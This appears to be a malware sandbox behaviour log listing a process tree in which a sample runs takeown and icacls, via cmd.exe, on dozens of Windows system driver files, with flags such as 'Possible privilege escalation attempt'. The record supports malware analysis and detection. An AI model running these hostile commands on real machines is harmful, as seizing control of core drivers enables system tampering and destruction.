C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ksthunk.sys /grant "Admin:F"3⤵PID:4700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lltdio.sys && icacls C:\Windows\System32\drivers\lltdio.sys /grant "%username%:F" && exit2⤵PID:1972
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lltdio.sys3⤵PID:3144
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lltdio.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:5248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_fc.sys && icacls C:\Windows\System32\drivers\lsi_fc.sys /grant "%username%:F" && exit2⤵PID:2488
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lsi_fc.sys3⤵PID:3108
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lsi_fc.sys /grant "Admin:F"3⤵PID:2296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_sas.sys && icacls C:\Windows\System32\drivers\lsi_sas.sys /grant "%username%:F" && exit2⤵PID:2788
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lsi_sas.sys3⤵PID:3200
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lsi_sas.sys /grant "Admin:F"3⤵PID:3160
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_sas2.sys && icacls C:\Windows\System32\drivers\lsi_sas2.sys /grant "%username%:F" && exit2⤵PID:2444
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lsi_sas2.sys3⤵PID:3272
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lsi_sas2.sys /grant "Admin:F"3⤵PID:5280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_scsi.sys && icacls C:\Windows\System32\drivers\lsi_scsi.sys /grant "%username%:F" && exit2⤵PID:2660
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lsi_scsi.sys3⤵PID:3420
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lsi_scsi.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:5496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\luafv.sys && icacls C:\Windows\System32\drivers\luafv.sys /grant "%username%:F" && exit2⤵PID:924
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\luafv.sys3⤵PID:3448
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\luafv.sys /grant "Admin:F"3⤵PID:5560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mcd.sys && icacls C:\Windows\System32\drivers\mcd.sys /grant "%username%:F" && exit2⤵PID:1120
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mcd.sys3⤵PID:3468
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mcd.sys /grant "Admin:F"3⤵PID:5744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\megasas.sys && icacls C:\Windows\System32\drivers\megasas.sys /grant "%username%:F" && exit2⤵PID:2100
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\megasas.sys3⤵
- Modifies file permissions
PID:3588
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\megasas.sys /grant "Admin:F"3⤵PID:5848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MegaSR.sys && icacls C:\Windows\System32\drivers\MegaSR.sys /grant "%username%:F" && exit2⤵PID:2232
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\MegaSR.sys3⤵PID:3652
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\MegaSR.sys /grant "Admin:F"3⤵PID:2736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\modem.sys && icacls C:\Windows\System32\drivers\modem.sys /grant "%username%:F" && exit2⤵PID:2808
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\modem.sys3⤵
- Modifies file permissions
PID:3824
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\modem.sys /grant "Admin:F"3⤵PID:6296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\monitor.sys && icacls C:\Windows\System32\drivers\monitor.sys /grant "%username%:F" && exit2⤵PID:1648
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\monitor.sys3⤵PID:3816
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\monitor.sys /grant "Admin:F"3⤵PID:1576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mouclass.sys && icacls C:\Windows\System32\drivers\mouclass.sys /grant "%username%:F" && exit2⤵PID:576
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mouclass.sys3⤵PID:3780
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mouclass.sys /grant "Admin:F"3⤵PID:3700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mouhid.sys && icacls C:\Windows\System32\drivers\mouhid.sys /grant "%username%:F" && exit2⤵PID:2696
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mouhid.sys3⤵PID:3700
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mouhid.sys /grant "Admin:F"3⤵PID:4464
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mountmgr.sys && icacls C:\Windows\System32\drivers\mountmgr.sys /grant "%username%:F" && exit2⤵PID:1868
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mountmgr.sys3⤵PID:4016
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mountmgr.sys /grant "Admin:F"3⤵PID:6596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mpio.sys && icacls C:\Windows\System32\drivers\mpio.sys /grant "%username%:F" && exit2⤵PID:2092
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mpio.sys3⤵PID:3948
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mpio.sys /grant "Admin:F"3⤵PID:6384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mpsdrv.sys && icacls C:\Windows\System32\drivers\mpsdrv.sys /grant "%username%:F" && exit2⤵PID:3004
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mpsdrv.sys3⤵PID:3932
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mpsdrv.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:6452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxdav.sys && icacls C:\Windows\System32\drivers\mrxdav.sys /grant "%username%:F" && exit2⤵PID:2540
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mrxdav.sys3⤵PID:4080
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mrxdav.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:6656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb.sys && icacls C:\Windows\System32\drivers\mrxsmb.sys /grant "%username%:F" && exit2⤵PID:1620
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mrxsmb.sys3⤵
- Modifies file permissions
PID:2688
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mrxsmb.sys /grant "Admin:F"3⤵PID:7052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb10.sys && icacls C:\Windows\System32\drivers\mrxsmb10.sys /grant "%username%:F" && exit2⤵PID:2012
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mrxsmb10.sys3⤵PID:3176
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mrxsmb10.sys /grant "Admin:F"3⤵PID:6996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb20.sys && icacls C:\Windows\System32\drivers\mrxsmb20.sys /grant "%username%:F" && exit2⤵PID:3096
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mrxsmb20.sys3⤵PID:2008
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mrxsmb20.sys /grant "Admin:F"3⤵PID:1736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msahci.sys && icacls C:\Windows\System32\drivers\msahci.sys /grant "%username%:F" && exit2⤵PID:3152
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msahci.sys3⤵PID:712
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msahci.sys /grant "Admin:F"3⤵PID:7060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msdsm.sys && icacls C:\Windows\System32\drivers\msdsm.sys /grant "%username%:F" && exit2⤵PID:3168
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msdsm.sys3⤵
- Possible privilege escalation attempt
PID:740
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msdsm.sys /grant "Admin:F"3⤵PID:5696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msfs.sys && icacls C:\Windows\System32\drivers\msfs.sys /grant "%username%:F" && exit2⤵PID:3216
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msfs.sys3⤵PID:3500
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msfs.sys /grant "Admin:F"3⤵PID:5908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf && icacls C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf /grant "%username%:F" && exit2⤵PID:3236
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf3⤵PID:268
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf /grant "Admin:F"3⤵PID:4048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mshidkmdf.sys && icacls C:\Windows\System32\drivers\mshidkmdf.sys /grant "%username%:F" && exit2⤵PID:3260
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mshidkmdf.sys3⤵PID:2576
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mshidkmdf.sys /grant "Admin:F"3⤵PID:6340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msisadrv.sys && icacls C:\Windows\System32\drivers\msisadrv.sys /grant "%username%:F" && exit2⤵PID:3284
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msisadrv.sys3⤵PID:4104
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msisadrv.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msiscsi.sys && icacls C:\Windows\System32\drivers\msiscsi.sys /grant "%username%:F" && exit2⤵PID:3304
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msiscsi.sys3⤵
- Modifies file permissions
PID:4252
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msiscsi.sys /grant "Admin:F"3⤵PID:6496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mskssrv.sys && icacls C:\Windows\System32\drivers\mskssrv.sys /grant "%username%:F" && exit2⤵PID:3340
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mskssrv.sys3⤵PID:4316
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mskssrv.sys /grant "Admin:F"3⤵PID:7200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mspclock.sys && icacls C:\Windows\System32\drivers\mspclock.sys /grant "%username%:F" && exit2⤵PID:3364
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mspclock.sys3⤵PID:4260
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mspclock.sys /grant "Admin:F"3⤵PID:6176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mspqm.sys && icacls C:\Windows\System32\drivers\mspqm.sys /grant "%username%:F" && exit2⤵PID:3396
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mspqm.sys3⤵PID:4280
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mspqm.sys /grant "Admin:F"3⤵PID:7192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msrpc.sys && icacls C:\Windows\System32\drivers\msrpc.sys /grant "%username%:F" && exit2⤵PID:3412
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msrpc.sys3⤵PID:4416
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msrpc.sys /grant "Admin:F"3⤵PID:7324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mssmbios.sys && icacls C:\Windows\System32\drivers\mssmbios.sys /grant "%username%:F" && exit2⤵PID:3432
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mssmbios.sys3⤵PID:4296
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mssmbios.sys /grant "Admin:F"3⤵PID:2328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mstee.sys && icacls C:\Windows\System32\drivers\mstee.sys /grant "%username%:F" && exit2⤵PID:3460
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mstee.sys3⤵PID:4304
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mstee.sys /grant "Admin:F"3⤵PID:7184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MTConfig.sys && icacls C:\Windows\System32\drivers\MTConfig.sys /grant "%username%:F" && exit2⤵PID:3484
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\MTConfig.sys3⤵PID:4424
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\MTConfig.sys /grant "Admin:F"3⤵PID:6540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mup.sys && icacls C:\Windows\System32\drivers\mup.sys /grant "%username%:F" && exit2⤵PID:3524
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mup.sys3⤵PID:4596
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mup.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:7488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndis.sys && icacls C:\Windows\System32\drivers\ndis.sys /grant "%username%:F" && exit2⤵PID:3536
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndis.sys3⤵PID:4552
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndis.sys /grant "Admin:F"3⤵PID:7312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndiscap.sys && icacls C:\Windows\System32\drivers\ndiscap.sys /grant "%username%:F" && exit2⤵PID:3556
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndiscap.sys3⤵PID:4496
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndiscap.sys /grant "Admin:F"3⤵PID:7360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndistapi.sys && icacls C:\Windows\System32\drivers\ndistapi.sys /grant "%username%:F" && exit2⤵PID:3576
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndistapi.sys3⤵PID:4664
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndistapi.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:7556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndisuio.sys && icacls C:\Windows\System32\drivers\ndisuio.sys /grant "%username%:F" && exit2⤵PID:3604
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndisuio.sys3⤵PID:4620
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndisuio.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:7572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndiswan.sys && icacls C:\Windows\System32\drivers\ndiswan.sys /grant "%username%:F" && exit2⤵PID:3636
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndiswan.sys3⤵
- Modifies file permissions
PID:4716
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndiswan.sys /grant "Admin:F"3⤵PID:7656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndproxy.sys && icacls C:\Windows\System32\drivers\ndproxy.sys /grant "%username%:F" && exit2⤵PID:3660
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndproxy.sys3⤵PID:4680
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndproxy.sys /grant "Admin:F"3⤵PID:7544
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netbios.sys && icacls C:\Windows\System32\drivers\netbios.sys /grant "%username%:F" && exit2⤵PID:3680
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\netbios.sys3⤵PID:4808
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\netbios.sys /grant "Admin:F"3⤵PID:7716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netbt.sys && icacls C:\Windows\System32\drivers\netbt.sys /grant "%username%:F" && exit2⤵PID:3716
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\netbt.sys3⤵
- Possible privilege escalation attempt
PID:4912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netio.sys && icacls C:\Windows\System32\drivers\netio.sys /grant "%username%:F" && exit2⤵PID:3740
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\netio.sys3⤵PID:5024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nfrd960.sys && icacls C:\Windows\System32\drivers\nfrd960.sys /grant "%username%:F" && exit2⤵PID:3764
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nfrd960.sys3⤵PID:5032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\npfs.sys && icacls C:\Windows\System32\drivers\npfs.sys /grant "%username%:F" && exit2⤵PID:3796
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\npfs.sys3⤵
- Possible privilege escalation attempt
PID:4956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nsiproxy.sys && icacls C:\Windows\System32\drivers\nsiproxy.sys /grant "%username%:F" && exit2⤵PID:3840
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nsiproxy.sys3⤵PID:1484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ntfs.sys && icacls C:\Windows\System32\drivers\ntfs.sys /grant "%username%:F" && exit2⤵PID:3860
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ntfs.sys3⤵PID:4972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\null.sys && icacls C:\Windows\System32\drivers\null.sys /grant "%username%:F" && exit2⤵PID:3876
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\null.sys3⤵PID:3912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nvraid.sys && icacls C:\Windows\System32\drivers\nvraid.sys /grant "%username%:F" && exit2⤵PID:3940
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nvraid.sys3⤵PID:3572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nvstor.sys && icacls C:\Windows\System32\drivers\nvstor.sys /grant "%username%:F" && exit2⤵PID:3968
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nvstor.sys3⤵PID:2172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\NV_AGP.SYS && icacls C:\Windows\System32\drivers\NV_AGP.SYS /grant "%username%:F" && exit2⤵PID:4004
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\NV_AGP.SYS3⤵
- Modifies file permissions
PID:2956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nwifi.sys && icacls C:\Windows\System32\drivers\nwifi.sys /grant "%username%:F" && exit2⤵PID:4032
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nwifi.sys3⤵PID:3632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ohci1394.sys && icacls C:\Windows\System32\drivers\ohci1394.sys /grant "%username%:F" && exit2⤵PID:4064
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ohci1394.sys3⤵PID:3388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pacer.sys && icacls C:\Windows\System32\drivers\pacer.sys /grant "%username%:F" && exit2⤵PID:3036
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pacer.sys3⤵PID:1884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\parport.sys && icacls C:\Windows\System32\drivers\parport.sys /grant "%username%:F" && exit2⤵PID:3032
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\parport.sys3⤵
- Modifies file permissions
PID:4220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\partmgr.sys && icacls C:\Windows\System32\drivers\partmgr.sys /grant "%username%:F" && exit2⤵PID:1644
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\partmgr.sys3⤵PID:4312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pci.sys && icacls C:\Windows\System32\drivers\pci.sys /grant "%username%:F" && exit2⤵PID:3000
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pci.sys3⤵PID:4468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pciide.sys && icacls C:\Windows\System32\drivers\pciide.sys /grant "%username%:F" && exit2⤵PID:1456
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pciide.sys3⤵
- Possible privilege escalation attempt
PID:5152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pciidex.sys && icacls C:\Windows\System32\drivers\pciidex.sys /grant "%username%:F" && exit2⤵PID:3080
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pciidex.sys3⤵PID:5212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pcmcia.sys && icacls C:\Windows\System32\drivers\pcmcia.sys /grant "%username%:F" && exit2⤵PID:3064
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pcmcia.sys3⤵PID:5040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pcw.sys && icacls C:\Windows\System32\drivers\pcw.sys /grant "%username%:F" && exit2⤵PID:2464
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pcw.sys3⤵
- Modifies file permissions
PID:5132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\PEAuth.sys && icacls C:\Windows\System32\drivers\PEAuth.sys /grant "%username%:F" && exit2⤵PID:2552
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\PEAuth.sys3⤵PID:5204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\portcls.sys && icacls C:\Windows\System32\drivers\portcls.sys /grant "%username%:F" && exit2⤵PID:3328
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\portcls.sys3⤵
- Possible privilege escalation attempt
PID:5260
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\processr.sys && icacls C:\Windows\System32\drivers\processr.sys /grant "%username%:F" && exit2⤵PID:3600
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\processr.sys3⤵PID:5356
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ql2300.sys && icacls C:\Windows\System32\drivers\ql2300.sys /grant "%username%:F" && exit2⤵PID:3712
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ql2300.sys3⤵
- Possible privilege escalation attempt
PID:5428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ql40xx.sys && icacls C:\Windows\System32\drivers\ql40xx.sys /grant "%username%:F" && exit2⤵PID:4128
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ql40xx.sys3⤵
- Modifies file permissions
PID:5576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\qwavedrv.sys && icacls C:\Windows\System32\drivers\qwavedrv.sys /grant "%username%:F" && exit2⤵PID:4192
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\qwavedrv.sys3⤵PID:5636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rasacd.sys && icacls C:\Windows\System32\drivers\rasacd.sys /grant "%username%:F" && exit2⤵PID:4236
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rasacd.sys3⤵
- Possible privilege escalation attempt
PID:5704
-
-
-
